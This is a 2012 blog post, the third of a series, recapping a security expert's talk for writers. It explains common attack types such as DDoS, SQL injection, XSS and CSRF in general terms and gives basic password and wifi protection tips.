Monday, July 30, 2012

JT Evans on Computer Security for Writers (Part 3) by DeAnna Knippling

Editor’s Note: This is the third in a three-part series. You can read Part 1 here and Part 2 here.

JT Evans, as well as being a writer, is a computer security expert who started programming at the age of seven and has been a Certified Ethical Hacker since 2009. During his June Write Brain talk, he covered three main topics: how writers should take care of their computers, computer security basics for writers, and what the bad guys are doing with computers.

What the Bad Guys Are Doing with Computers

The bad guys are violating one of three principles of computer security when they go after someone’s computer:
Confidentiality. For example, sending your personal information without authorization.
Integrity. For example, changing test scores or introducing a virus onto your system.
Accessibility. For example, taking down a website or server.
These are known as the CIA triad of computer security.

What methods can the bad guys use?

Denial of Service (DOS) or Distributed Denial of Service (DDOS) attack. This kind of attack blocks user access of a computer, website, or network. The DOS too advantage of a particular vulnerability in the Windows 95/ME/XP operating systems that let a bad guy crash your computer (a division by zero error was involved). DOS vulnerabilities are mostly closed now. DDOS attacks are a technique using botnets to send so many requests to a webpage or server that the server is unable to provide access all the requests--effectively taking down the webpage or server for a time.

Weak password vulnerabilities. A computer program can guess a lot of passwords using dictionary files, very quickly. Because a lot of people have easily guessed passwords (from things like “password” to their spouse’s name), a lot of people are vulnerable to this kind of attack. Here are some password tips:
Use at least eight characters.
Use a mix of lowercase, uppercase, and symbols whenever possible.
Don’t depend on replacing letters with numbers (as in p@ssw0rd), because those types of replacements are in the programs’ dictionaries now, too.
Don’t use an easily guessed word or code as a password (password, 123456, qwerty, letmein, etc).
Use a phrase that you can easily remember (like a book title) to build a password, using the initial letters of each word in the phrase (e.g., TQBFJOTLD for “The quick brown fox jumps over the lazy dog”).
Don’t use the same password everywhere; in some cases, if a computer or website is hacked, then all the passwords on it are vulnerable (as in the recent LinkedIn hacking). You don’t want your password at your bank to be hacked just because someone hacked into a social networking site, do you?
A good way to store passwords is to have one really good password that you don’t use anywhere else that you save for a GPG-encrypted text file that stores all your other passwords (including user names and websites).
Buffer overflows. When you’re inputting data into a field, if the field is, say, 10 characters long for a phone number, and if the field isn’t protected from someone typing in too many characters, then the extra information (after the first ten characters, in our example) can be used to reprogram the software. In the past, this was the most common way to attack a system; now, with more protection being developed, it’s moving to #2 after...

SQL injection. Structured Query Language (SQL) is the programming language used in relational databases. It’s like a buffer overflow in that you type extra information to force the database to do something it wasn’t supposed to do, but the techniques are specific to SQL databases.

Social engineering. This is using clever tricks to get people to give you information. If someone ever asks you for personal information, and you didn’t initiate the request by asking for something first, it’s probably social engineering (for example, phishing emails or even fake antivirus software).

Cross Site Scripting (XSS). This takes over your browser by injecting code into a website, then letting the website do naughty things to your browser. This can be used to create a browser-based botnet.

Cross Site Request Forgery (CSRF). This uses HTML to trick your browser into turning one action into doing a different action instead. For example, if you clicked anywhere on an Amazon page, a bad guy might use CSRF to force the click to work on the “Buy now with 1-Click” button instead.

Lack of encryption. An unsecured wireless network can be used to do many things, include monitoring every action on your desktop. You should use a Virtual Private Network (VPN) if you have one, if you’re on unsecured wifi, and use Secure Socket Layer (SSL) (that is, a site that starts with https:// rather than http://) when possible. Also, when you’re choosing the encryption for your wireless network, use WPA, rather than the WEP or WEP2 options, which are easily broken.

Network/Host scanning. There are a wealth of tools available that will scan for vulnerabilities. These are used by both the bad guys and the good guys: the bad guys to try to break into systems; the good guys to make sure it won’t be easy to break in. Some examples are nmap, Nessus/OpenVAS, Metasploit, and kismet.

If you need more information, you can go to JT’s website, jtevans.net.

If you’d like a copy of his handouts, click here.

About the Writer:  DeAnna Knippling is a freelance writer, editor, and formatter married to a Network Administrator, and she was still embarrassed about some of her personal security practices after hearing JT's talk.  Check out her personal blog at www.DeAnnaKnippling.com or her small press at www.WonderlandPress.com.